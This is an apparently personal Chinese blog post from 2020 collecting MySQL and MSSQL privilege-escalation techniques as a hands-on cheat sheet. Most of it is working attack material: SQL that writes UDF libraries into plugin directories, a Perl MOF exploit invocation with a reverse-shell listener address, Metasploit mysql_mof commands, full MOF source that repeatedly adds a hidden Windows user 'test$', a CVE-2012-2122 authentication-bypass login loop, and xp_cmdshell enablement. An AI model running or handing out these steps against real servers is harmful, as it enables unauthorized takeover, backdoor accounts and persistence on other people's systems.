<!DOCTYPE html><html lang="zh-Hans"><head><meta name="generator" content="Hexo 3.8.0"><meta charset="UTF-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1"><meta name="description" content="mysql提权总结"><meta name="keywords" content="mysql提权"><meta name="author" content="Arnoux"><meta name="copyright" content="Arnoux"><title>mysql提权总结 | 樱花边缘</title><link rel="shortcut icon" href="/melody-favicon.ico"><link rel="stylesheet" href="/css/index.css?version=1.9.0"><link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/font-awesome@latest/css/font-awesome.min.css?version=1.9.0"><meta name="format-detection" content="telephone=no"><meta http-equiv="x-dns-prefetch-control" content="on"><link rel="dns-prefetch" href="https://cdn.jsdelivr.net"><link rel="dns-prefetch" href="https://hm.baidu.com"><script>var _hmt = _hmt || [];
(function() {
  var hm = document.createElement("script");
  hm.src = "https://hm.baidu.com/hm.js?05dffefe4c841128965d826f624af472";
  var s = document.getElementsByTagName("script")[0]; 
  s.parentNode.insertBefore(hm, s);
})();</script><script>var GLOBAL_CONFIG = { 
  root: '/',
  algolia: undefined,
  localSearch: undefined,
  copy: {
    success: '复制成功',
    error: '复制错误',
    noSupport: '浏览器不支持'
  },
  hexoVersion: '3.8.0'
} </script></head><body><canvas class="fireworks"></canvas><i class="fa fa-arrow-right" id="toggle-sidebar" aria-hidden="true"></i><div id="sidebar" data-display="true"><div class="toggle-sidebar-info text-center"><span data-toggle="切换文章详情">切换站点概览</span><hr></div><div class="sidebar-toc"><div class="sidebar-toc__title">目录</div><div class="sidebar-toc__progress"><span class="progress-notice">你已经读了</span><span class="progress-num">0</span><span class="progress-percentage">%</span><div class="sidebar-toc__progress-bar"></div></div><div class="sidebar-toc__content"><ol class="toc"><li class="toc-item toc-level-1"><a class="toc-link" href="#mysql提权"><span class="toc-number">1.</span> <span class="toc-text">mysql提权</span></a><ol class="toc-child"><li class="toc-item toc-level-2"><a class="toc-link" href="#前言"><span class="toc-number">1.1.</span> <span class="toc-text">前言</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#UDF"><span class="toc-number">1.1.1.</span> <span class="toc-text">UDF</span></a><ol class="toc-child"><li class="toc-item toc-level-4"><a class="toc-link" href="#创建文件夹"><span class="toc-number">1.1.1.1.</span> <span class="toc-text">创建文件夹</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#udf注入-Linux"><span class="toc-number">1.1.1.2.</span> <span class="toc-text">udf注入(Linux)</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#udf马"><span class="toc-number">1.1.1.3.</span> <span class="toc-text">udf马</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#udf反弹shell"><span class="toc-number">1.1.1.4.</span> <span class="toc-text">udf反弹shell</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#mysql自动化上传"><span class="toc-number">1.1.1.5.</span> <span class="toc-text">mysql自动化上传</span></a></li></ol></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#mof提权"><span class="toc-number">1.2.</span> <span class="toc-text">mof提权</span></a><ol class="toc-child"><li class="toc-item toc-level-4"><a class="toc-link" href="#MSF"><span class="toc-number">1.2.0.1.</span> <span class="toc-text">MSF</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#手动"><span class="toc-number">1.2.0.2.</span> <span class="toc-text">手动</span></a></li></ol></li><li class="toc-item toc-level-3"><a class="toc-link" href="#hackmysql综合利用工具"><span class="toc-number">1.2.1.</span> <span class="toc-text">hackmysql综合利用工具</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#允许远程连接"><span class="toc-number">1.2.2.</span> <span class="toc-text">允许远程连接</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#CVE-2012-2122-Mysql身份认证漏洞"><span class="toc-number">1.2.3.</span> <span class="toc-text">CVE-2012-2122 Mysql身份认证漏洞</span></a><ol class="toc-child"><li class="toc-item toc-level-4"><a class="toc-link" href="#SA提权辅助"><span class="toc-number">1.2.3.1.</span> <span class="toc-text">SA提权辅助</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#xp-cmdshell命令执行"><span class="toc-number">1.2.3.2.</span> <span class="toc-text">xp_cmdshell命令执行</span></a></li></ol></li></ol></li></ol></div></div><div class="author-info hide"><div class="author-info__avatar text-center"><img src="/img/avatar.png"></div><div class="author-info__name text-center">Arnoux</div><div class="author-info__description text-center"></div><hr><div class="author-info-articles"><a class="author-info-articles__archives article-meta" href="/archives"><span class="pull-left">文章</span><span class="pull-right">18</span></a><a class="author-info-articles__tags article-meta" href="/tags"><span class="pull-left">标签</span><span class="pull-right">6</span></a></div></div></div><div id="content-outer"><div id="top-container" style="background-image: url(https://raw.githubusercontent.com/gwjczwy/gwjczwy.github.io/master/img/background.png)"><div id="page-header"><span class="pull-left"> <a id="site-name" href="/">樱花边缘</a></span><i class="fa fa-bars toggle-menu pull-right" aria-hidden="true"></i><span class="pull-right menus">   <a class="site-page" href="/">Home</a><a class="site-page" href="/archives">Archives</a><a class="site-page" href="/tags">Tags</a><a class="site-page" href="https://github.com/gwjczwy">Github</a></span><span class="pull-right"></span></div><div id="post-info"><div id="post-title">mysql提权总结</div><div id="post-meta"><time class="post-meta__date"><i class="fa fa-calendar" aria-hidden="true"></i> 2020-07-30</time></div></div></div><div class="layout" id="content-inner"><article id="post"><div class="article-container" id="post-content"><h1 id="mysql提权"><a href="#mysql提权" class="headerlink" title="mysql提权"></a>mysql提权</h1><h2 id="前言"><a href="#前言" class="headerlink" title="前言"></a>前言</h2><p>事出有因，发现mysql的提权还不是很熟。需要研究一下。<br>另外，如果真的想成为一名大师，对于一个东西一定要熟。你把它研究透了，从内到外都滚瓜烂熟了，才有可能在遇到需要它的时候成功利用。<br>你永远不知道下一秒会发生什么。很有可能下一秒机会就出现。而那些真正厉害的黑客一定是早早就把可能用到的东西研究透了，已经烂熟于心。这样才能在那些稍纵即逝的机会面前抓住他。<br>不只是第一步，思路一定要清晰。在踏出第一步之前就已经对于每一步可能发生的情况都非常清楚，知道要向什么方向走。</p>
<h3 id="UDF"><a href="#UDF" class="headerlink" title="UDF"></a>UDF</h3><h4 id="创建文件夹"><a href="#创建文件夹" class="headerlink" title="创建文件夹"></a>创建文件夹</h4><p>因为默认是没有这个文件夹的：C:/Users/username/Documents/phpstudy/MySQL/lib/plugin</p>
<figure class="highlight plain"><table><tr><td class="code"><pre><span class="line">select @@basedir;   </span><br><span class="line">//查找到mysql的目录</span><br><span class="line">select &apos;It is dll&apos; into dumpfile &apos;C:\\Users\\username\\Documents\\phpstudyMySQL\\lib::$INDEX_ALLOCATION&apos;;   </span><br><span class="line">//利用NTFS ADS创建lib目录</span><br><span class="line">select &apos;It is dll&apos; into dumpfile &apos;C:\\Users\\username\\Documents\\phpstudyMySQL\\lib\\plugin::$INDEX_ALLOCATION&apos;;</span><br><span class="line">//利用NTFS ADS创建plugin目录</span><br></pre></td></tr></table></figure>
<h4 id="udf注入-Linux"><a href="#udf注入-Linux" class="headerlink" title="udf注入(Linux)"></a>udf注入(Linux)</h4><p><a href="../../../../img/mysql提权/linux_udf_64.txt">linux_udf_64.so</a>这个不知道函数名是啥，从下面的常用命令看应该是叫<code>sys_eval</code>。</p>
<p><a href="../../../../img/mysql提权/mysql-udf命令.txt">linux_udf常用命令</a></p>
<h4 id="udf马"><a href="#udf马" class="headerlink" title="udf马"></a>udf马</h4><p><a href="../../../../img/mysql提权/udf.php">udf.php</a></p>
<h4 id="udf反弹shell"><a href="#udf反弹shell" class="headerlink" title="udf反弹shell"></a>udf反弹shell</h4><p><a href="../../../../img/mysql提权/mysqlShellExp.txt">mysqlShellExp.txt</a>这个udf.dll文件有点大，可能有后门。。。</p>
<p>运行创建函数的时候会提示没有这个函数，但实际上是成功的。</p>
<p><img src="../../../../img/mysql提权/image-20200728135149596.png" alt="image-20200728135149596"></p>
<p><img src="../../../../img/mysql提权/image-20200728144754247.png" alt="image-20200728144754247"></p>
<h4 id="mysql自动化上传"><a href="#mysql自动化上传" class="headerlink" title="mysql自动化上传"></a>mysql自动化上传</h4><p>python sqlmap.py -u ‘xxxx’ –file-write=/lib_mysqludf_sys.so  –file-dest=/usr/lib/mysql/plugin/</p>
<h2 id="mof提权"><a href="#mof提权" class="headerlink" title="mof提权"></a>mof提权</h2><p>要winServer2003以下才能用。。</p>
<p><a href="https://github.com/offensive-security/exploitdb-bin-sploits/blob/master/bin-sploits/23083.zip" target="_blank" rel="noopener">国外大神0day工具</a></p>
<p><strong>用法：</strong></p>
<figure class="highlight cmd"><table><tr><td class="code"><pre><span class="line">perl mysql_win_remote.pl <span class="number">10</span>.<span class="number">211</span>.<span class="number">55</span>.<span class="number">3</span> root root <span class="number">10</span>.<span class="number">211</span>.<span class="number">55</span>.<span class="number">4</span> <span class="number">9999</span></span><br><span class="line">mysql服务器地址 账号 密码 反弹shell地址 端口</span><br></pre></td></tr></table></figure>
<p>perl需要安装 DBD::mysql DBD 模块。mac10.15.5 安装失败。。</p>
<h4 id="MSF"><a href="#MSF" class="headerlink" title="MSF"></a>MSF</h4><p>win7的用msf模块打了，不成功。</p>
<figure class="highlight bash"><table><tr><td class="code"><pre><span class="line">use exploit/windows/mysql/mysql_mof</span><br><span class="line"><span class="built_in">set</span> password root</span><br><span class="line"><span class="built_in">set</span> username</span><br><span class="line"><span class="built_in">set</span> rhost</span><br><span class="line"><span class="built_in">set</span> rport</span><br><span class="line"><span class="built_in">set</span> lhost</span><br><span class="line">exploit</span><br></pre></td></tr></table></figure>
<p>据说windows2003可以。</p>
<h4 id="手动"><a href="#手动" class="headerlink" title="手动"></a>手动</h4><p>nullevt.mof文件源码</p>
<figure class="highlight bash"><table><tr><td class="code"><pre><span class="line"><span class="comment">#pragma namespace("\\\\.\\root\\subscription")</span></span><br><span class="line">instance of __EventFilter as <span class="variable">$EventFilter</span></span><br><span class="line">&#123;</span><br><span class="line">EventNamespace = <span class="string">"Root\\Cimv2"</span>;</span><br><span class="line">Name = <span class="string">"filtP2"</span>;</span><br><span class="line">Query = <span class="string">"Select * From __InstanceModificationEvent "</span></span><br><span class="line"><span class="string">"Where TargetInstance Isa \"Win32_LocalTime\" "</span></span><br><span class="line"><span class="string">"And TargetInstance.Second = 5"</span>;</span><br><span class="line">QueryLanguage = <span class="string">"WQL"</span>;</span><br><span class="line">&#125;;</span><br><span class="line">instance of ActiveScriptEventConsumer as <span class="variable">$Consumer</span></span><br><span class="line">&#123;</span><br><span class="line">Name = <span class="string">"consPCSV2"</span>;</span><br><span class="line">ScriptingEngine = <span class="string">"JScript"</span>;</span><br><span class="line">ScriptText =</span><br><span class="line"><span class="string">"var WSH = new ActiveXObject(\"WScript.Shell\")\nWSH.run(\"net.exe user test$ cKediTor /add\")"</span>;</span><br><span class="line">&#125;;</span><br><span class="line">instance of __FilterToConsumerBinding</span><br><span class="line">&#123;</span><br><span class="line">Consumer = <span class="variable">$Consumer</span>;</span><br><span class="line">Filter = <span class="variable">$EventFilter</span>;</span><br><span class="line">&#125;;</span><br></pre></td></tr></table></figure>
<p><strong>用法：</strong></p>
<p>系统每五秒创建一个账户<code>test$</code>，里面命令可以自定义<br>使用sql语句将文件导入到<code>c:/windows/system32/wbem/mof/</code>下</p>
<figure class="highlight plain"><table><tr><td class="code"><pre><span class="line">select load_file(&quot;C:/phpstudy/WWW/nullevt.mof&quot;) into dumpfile &quot;c:/windows/system32/wbem/mof/nullevt.mof&quot;</span><br></pre></td></tr></table></figure>
<p>利用的是windows系统的一个机制，以管理员权限每5分钟执行一次。</p>
<p>万一成功了想要删掉需要：</p>
<figure class="highlight cmd"><table><tr><td class="code"><pre><span class="line"><span class="built_in">net</span> stop winmgmt</span><br><span class="line"><span class="built_in">net</span> user ghtwf011 /delete</span><br><span class="line">切换到 c:/windows/system32/wbem 目录</span><br><span class="line"><span class="built_in">del</span> repository</span><br><span class="line"><span class="built_in">net</span> <span class="built_in">start</span> winmgmt</span><br></pre></td></tr></table></figure>
<h3 id="hackmysql综合利用工具"><a href="#hackmysql综合利用工具" class="headerlink" title="hackmysql综合利用工具"></a>hackmysql综合利用工具</h3><p><a href="https://github.com/T3st0r-Git/HackMySQL" target="_blank" rel="noopener">https://github.com/T3st0r-Git/HackMySQL</a></p>
<p>集成了<strong>全自动udf一键执行命令</strong>(里面有几个自带的dll，不知道有没有后门)</p>
<p><img src="../../../../img/mysql提权/image-20200728111918702.png" alt="image-20200728111918702"></p>
<p><strong>写启动项</strong></p>
<p><strong>LPK.dll劫持系统目录提权</strong></p>
<p>这个试了也提示成功但实际上是没有这个账户的。。</p>
<p><img src="../../../../img/mysql提权/image-20200728111712200.png" alt="image-20200728111712200"></p>
<p><img src="../../../../img/mysql提权/image-20200728111730064.png" alt="image-20200728111730064"></p>
<h3 id="允许远程连接"><a href="#允许远程连接" class="headerlink" title="允许远程连接"></a>允许远程连接</h3><p>更改 “mysql” 数据库里的 user 表里的 host 项，将 localhost 改为 %</p>
<h3 id="CVE-2012-2122-Mysql身份认证漏洞"><a href="#CVE-2012-2122-Mysql身份认证漏洞" class="headerlink" title="CVE-2012-2122 Mysql身份认证漏洞"></a>CVE-2012-2122 Mysql身份认证漏洞</h3><p>不断尝试登陆，平均256次就能成功一次。无需密码。</p>
<figure class="highlight python"><table><tr><td class="code"><pre><span class="line"><span class="comment">#!/usr/bin/python</span></span><br><span class="line"><span class="keyword">import</span> subprocess</span><br><span class="line"></span><br><span class="line"><span class="keyword">while</span> <span class="number">1</span>:</span><br><span class="line">        subprocess.Popen(<span class="string">"mysql -u root -p -h 192.168.0.16 --password=test"</span>, shell=<span class="literal">True</span>).wait()</span><br></pre></td></tr></table></figure>
<figure class="highlight bash"><table><tr><td class="code"><pre><span class="line"><span class="keyword">for</span> i <span class="keyword">in</span> `seq 1 1000`; <span class="keyword">do</span> mysql -u root -p -h 192.168.0.16 --password=bad 2&gt;/dev/null; <span class="keyword">done</span></span><br></pre></td></tr></table></figure>
<h4 id="SA提权辅助"><a href="#SA提权辅助" class="headerlink" title="SA提权辅助"></a>SA提权辅助</h4><p><a href="http://bugs.hacking8.com/tiquan/?m=sql-sa" target="_blank" rel="noopener">http://bugs.hacking8.com/tiquan/?m=sql-sa</a></p>
<h4 id="xp-cmdshell命令执行"><a href="#xp-cmdshell命令执行" class="headerlink" title="xp_cmdshell命令执行"></a>xp_cmdshell命令执行</h4><p>开启xp_cmdshell</p>
<figure class="highlight plain"><table><tr><td class="code"><pre><span class="line">EXECsp_configure&apos;showadvancedoptions&apos;,1;RECONFIGURE;EXECsp_configu re&apos;xp_cmdshell&apos;,1;RECONFIGURE;</span><br></pre></td></tr></table></figure>
<p>当提示”不支持对系统目录进行即席更新”</p>
<figure class="highlight plain"><table><tr><td class="code"><pre><span class="line">EXEC sp_configure &apos;show advanced options&apos;, 1;RECONFIGURE WITH over ride;EXEC sp_configure</span><br><span class="line">&apos;xp_cmdshell&apos;, 1;RECONFIGURE WITH override;EXEC sp_configure &apos;show advanced options&apos;, 0;</span><br></pre></td></tr></table></figure>
<figure class="highlight plain"><table><tr><td class="code"><pre><span class="line">exec master..xp_cmdshell &apos;whoami&apos;</span><br></pre></td></tr></table></figure>
<p>判断xp_cmdshell是否存在</p>
<figure class="highlight plain"><table><tr><td class="code"><pre><span class="line">SELECT count(*) FROM master.dbo.sysobjects WHERE xtype = &apos;X&apos; AND n ame = &apos;xp_cmdshell&apos;</span><br></pre></td></tr></table></figure>
<p>关闭xp_cmdshell</p>
<figure class="highlight plain"><table><tr><td class="code"><pre><span class="line">EXEC sp_configure &apos;show advanced options&apos;, 1;RECONFIGURE;EXEC sp_c onfigure &apos;xp_cmdshell&apos;, 0;RECONFIGURE;</span><br></pre></td></tr></table></figure>
<!--恍惚间想起自己还有一个博客，还有等着我实现的梦想。感觉总算是入了圈，后面的路还有很长。
回头看看已经一年了，看着自己一年多以前写下的内容惊呼：“我竟然会用这种口吻说话？这根本不是我！”才惊觉时光流逝以为不变的我竟发生了如此大的变化。原来不管怎样我一直都在变。既然如此也没有必要死守着那个年少的自己了。归来者才是少年，因此仍是少年。--></div></article><div class="post-meta__tag-list"><a class="post-meta__tags" href="/tags/mysql提权/">mysql提权</a></div><nav id="pagination"><div class="prev-post pull-left"><a href="/2020/11/04/解决MACOS网络配置页面卡死/"><i class="fa fa-chevron-left">  </i><span>解决MACOS网络配置页面卡死</span></a></div><div class="next-post pull-right"><a href="/2019/08/09/De1ctf2019 梳理/"><span>De1ctf2019 梳理</span><i class="fa fa-chevron-right"></i></a></div></nav></div></div><footer class="footer-bg" style="background-image: url(https://raw.githubusercontent.com/gwjczwy/gwjczwy.github.io/master/img/background.png)"><div class="layout" id="footer"><div class="copyright">&copy;2019 - 2021 By Arnoux</div><div class="framework-info"><span>驱动 - </span><a href="http://hexo.io"><span>Hexo</span></a><span class="footer-separator">|</span><span>主题 - </span><a href="https://github.com/Molunerfinn/hexo-theme-melody"><span>Melody</span></a></div><div class="busuanzi"><script async src="//busuanzi.ibruce.info/busuanzi/2.3/busuanzi.pure.mini.js"></script><span id="busuanzi_container_page_pv"><i class="fa fa-file-o"></i><span id="busuanzi_value_page_pv"></span><span></span></span></div></div></footer><i class="fa fa-arrow-up" id="go-up" aria-hidden="true"></i><script src="https://cdn.jsdelivr.net/npm/animejs@latest/anime.min.js"></script><script src="https://cdn.jsdelivr.net/npm/jquery@latest/dist/jquery.min.js"></script><script src="https://cdn.jsdelivr.net/npm/@fancyapps/fancybox@latest/dist/jquery.fancybox.min.js"></script><script src="https://cdn.jsdelivr.net/npm/velocity-animate@latest/velocity.min.js"></script><script src="https://cdn.jsdelivr.net/npm/velocity-ui-pack@latest/velocity.ui.min.js"></script><script src="/js/utils.js?version=1.9.0"></script><script src="/js/fancybox.js?version=1.9.0"></script><script src="/js/sidebar.js?version=1.9.0"></script><script src="/js/copy.js?version=1.9.0"></script><script src="/js/fireworks.js?version=1.9.0"></script><script src="/js/transition.js?version=1.9.0"></script><script src="/js/scroll.js?version=1.9.0"></script><script src="/js/head.js?version=1.9.0"></script><script>if(/Android|webOS|iPhone|iPod|iPad|BlackBerry/i.test(navigator.userAgent)) {
  $('#nav').addClass('is-mobile')
  $('footer').addClass('is-mobile')
  $('#top-container').addClass('is-mobile')
}</script></body></html>